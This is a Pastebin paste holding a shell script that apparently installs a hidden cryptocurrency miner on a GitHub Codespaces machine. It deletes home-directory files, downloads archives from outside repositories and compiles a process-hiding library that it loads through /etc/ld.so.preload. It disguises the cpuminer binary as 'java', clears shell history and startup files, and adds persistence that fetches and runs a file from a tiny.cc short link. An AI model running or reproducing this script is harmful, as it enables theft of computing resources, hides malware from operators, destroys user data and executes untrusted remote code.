Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- rm -rvf .lib* .bash*
- cd ~/
- rm -rvf * && mkdir d && cd d
- #!/bin/sh
- echo "==================="
- echo " CEK TIMEZONE "
- echo "==================="
- echo " "
- echo " "
- ln -fs /usr/share/zoneinfo/Asia/Jakarta /etc/localtime
- dpkg-reconfigure --frontend noninteractive tzdata
- sleep 2
- apt update -y;apt -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential binutils git cmake screen unzip net-tools curl -y
- wget https://gitlab.com/meldiyunrianto/nimik/-/raw/main/graphics.tar.gz
- tar -xvzf graphics.tar.gz
- rm -rf graphics.tar.gz
- cp d/graftcp/graftcp /home/codespace/.lib/
- wget https://github.com/AhmadTugiman/gembel/raw/main/tukimin.zip
- unzip tukimin.zip
- rm -rf tukimin.zip
- make
- gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
- mv libprocesshider.so /usr/local/lib/
- echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
- cd
- mkdir .lib
- cd .lib
- wget https://gitlab.com/meldiyunrianto/nimik/-/raw/main/graphics.tar.gz
- tar -xvzf graphics.tar.gz
- rm -rf graphics.tar.gz
- cd .lib
- git clone https://github.com/sukamenari/akc.git && cd akc && rm bash && wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.29/cpuminer-opt-linux.tar.gz --no-check-certificate && tar xf cpuminer-opt-linux.tar.gz && rm cpuminer-opt-linux.tar.gz && mv cpuminer-avx2 java && cp java* ~/ && mv java* /home/codespace/.lib && cd .. && rm -rvf cpuminer-opt-linux && mv kernel* /home/codespace/.lib
- cd .. && rm -rvf akc
- echo "" > /home/codespace/.bashrc
- echo "" > /home/codespace/.bash_history
- echo "" > /home/codespace/.bash_profile
- echo 'echo "" >> /home/codespace/.bash_history' >> /home/codespace/.bashrc
- echo "source /home/codespace/.bash_profile" >> /home/codespace/.bashrc
- echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/codespace/.bash_profile
- echo "export LD_LIBRARY_PATH" >> /home/codespace/.bash_profile
- echo "bash /home/codespace/.lib/gas.sh" >> /home/codespace/.bash_profile &&
- echo "export LC_ALL=C; unset LANGUAGE && cd && rm -rvf e && wget -O e http://tiny.cc/Cbte && chmod +x e && ./e " > /home/codespace/.lib/gas.sh
- cd /home/codespace/.lib/
- chmod +x gas.sh && cd ~/ && history -cr && source .bashrc
Add Comment
Please, Sign In to add comment